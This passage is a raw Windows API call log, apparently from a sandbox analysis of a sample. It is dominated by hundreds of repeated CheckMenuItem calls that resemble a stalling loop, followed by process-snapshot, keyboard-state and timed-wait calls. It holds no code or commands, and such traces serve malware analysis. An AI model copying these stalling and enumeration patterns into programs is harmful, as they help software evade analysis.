0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.088] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.089] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.090] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.091] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.092] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.093] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0028.094] SetWindowLongA (hWnd=0x0, nIndex=-4, dwNewLong=4207472) returned 0 [0028.094] DestroyWindow (hWnd=0x0) returned 0 [0028.095] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0xfffc4830, lParam=0x35e9481) returned 0x0 [0028.095] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x8) returned 0x1ce12c0 [0028.095] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x20) returned 0x1ce12d0 [0028.095] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x10) returned 0x1ce12f8 [0028.095] GetCursorPos (in: lpPoint=0x18f3d4 | out: lpPoint=0x18f3d4*(x=819, y=455)) returned 1 [0028.095] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="xxx") returned 0x100 [0028.095] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0028.095] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0028.095] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=819, y=455)) returned 1 [0028.095] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0028.095] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0028.098] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0028.098] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0028.098] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0031.084] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0031.084] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0031.084] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=819, y=455)) returned 1 [0031.084] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0031.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x110 [0031.086] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0031.086] 